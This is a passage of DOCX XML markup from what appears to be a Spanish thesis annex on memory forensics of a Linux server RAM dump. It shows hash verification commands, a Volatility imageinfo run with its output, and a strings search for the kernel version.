        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-FileHash .\Server_RAM.mem -Algorithm MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37511E0B" w14:textId="6475E662" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="004552FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E3231" w14:textId="1AE7E54A" w:rsidR="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="004552FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E0CE27" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Hlk155649013"/>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F242F" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Algorithm       Hash                                                                   Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BD2FF" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---------       ----                                                                   ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC10200" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MD5             75A99B57032AA34BA19042ED85DB273F                                       D:\TFM\RAM\...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF66A4B" w14:textId="17AE7B68" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="166"/>
    <w:p w14:paraId="47372B38" w14:textId="77777777" w:rsidR="004552FE" w:rsidRDefault="004552FE" w:rsidP="004552FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2727A2F5" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A36872" w14:textId="54D6489A" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-FileHash .\Server_RAM.mem -Algorithm SHA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E2296" w14:textId="35EAB648" w:rsidR="004552FE" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E0F1F2" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820E480" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B9756" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Algorithm       Hash                                                                   Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29697458" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---------       ----                                                                   ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B2B4A" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SHA1            CC1FAD2AF321B8C2DDF0103986E3B344EB8F2CC8                               D:\TFM\RAM\...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92E174" w14:textId="367C2884" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="00C9562B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28915365" w14:textId="358AB51E" w:rsidR="00D52A79" w:rsidRDefault="00D52A79">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66804A3F" w14:textId="4168397A" w:rsidR="00075CA6" w:rsidRDefault="004C5DDC" w:rsidP="00D52A79">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Ref155716489"/>
      <w:bookmarkStart w:id="168" w:name="_Ref155653913"/>
      <w:bookmarkStart w:id="169" w:name="_Toc155782527"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">III. </w:t>
      </w:r>
      <w:r w:rsidR="00075CA6">
        <w:t xml:space="preserve"> Comando linux_imageinfo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="7DD1212C" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB6DFAB" w14:textId="6303C775" w:rsidR="00C40F56" w:rsidRPr="00C9562B" w:rsidRDefault="00C40F56" w:rsidP="00C40F56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD5A80" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRPr="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00D8346B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE15AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py -f '/home/jrodg85/Server_RAM.mem' imageinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BDD40F" w14:textId="77777777" w:rsidR="00C40F56" w:rsidRPr="00C9562B" w:rsidRDefault="00C40F56" w:rsidP="00C40F56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0695BB" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00C40F56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127D12F4" w14:textId="4CBBCF25" w:rsidR="00C40F56" w:rsidRDefault="00C40F56" w:rsidP="00C40F56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470CAFA9" w14:textId="77777777" w:rsidR="00CE15AE" w:rsidRDefault="00CE15AE" w:rsidP="00C40F56">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634CC366" w14:textId="77777777" w:rsidR="00C40F56" w:rsidRPr="00C9562B" w:rsidRDefault="00C40F56" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044FFA4" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8346B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021024BA" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6DA9B6" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8346B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>INFO    : volatility.debug    : Determining profile based on KDBG search...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405DA77F" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C14A10E" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8346B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">          Suggested Profile(s) : No suggestion (Instantiated with no profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF8841" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E736C2D" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8346B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                     AS Layer1 : LimeAddressSpace (Unnamed AS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B23A4" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D09EF3D" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8346B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                     AS Layer2 : FileAddressSpace (/home/jrodg85/Server_RAM.mem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3385A" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712BB86C" w14:textId="77777777" w:rsidR="00D8346B" w:rsidRPr="00D8346B" w:rsidRDefault="00D8346B" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8346B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                      PAE type : No PAE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE596D" w14:textId="77777777" w:rsidR="00C40F56" w:rsidRPr="00C9562B" w:rsidRDefault="00C40F56" w:rsidP="00D8346B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B2759" w14:textId="77777777" w:rsidR="00075CA6" w:rsidRDefault="00075CA6" w:rsidP="00075CA6"/>
    <w:p w14:paraId="3DD6376C" w14:textId="5E18EC52" w:rsidR="00075CA6" w:rsidRDefault="00075CA6">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EE791" w14:textId="48522DE8" w:rsidR="00075CA6" w:rsidRPr="00075CA6" w:rsidRDefault="00075CA6" w:rsidP="00075CA6">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Ref155717081"/>
      <w:bookmarkStart w:id="171" w:name="_Toc155782528"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IV. Comando Strings linux version.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="38D5ED16" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F538FE" w14:textId="77777777" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB8685A" w14:textId="79883A68" w:rsidR="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>strings '/home/jrodg85/Server_RAM.mem' | grep -Ei "linux version" | uniq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3CDFA4" w14:textId="6BFD3A74" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CDECAA" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5C84F3" w14:textId="5B0C16A7" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
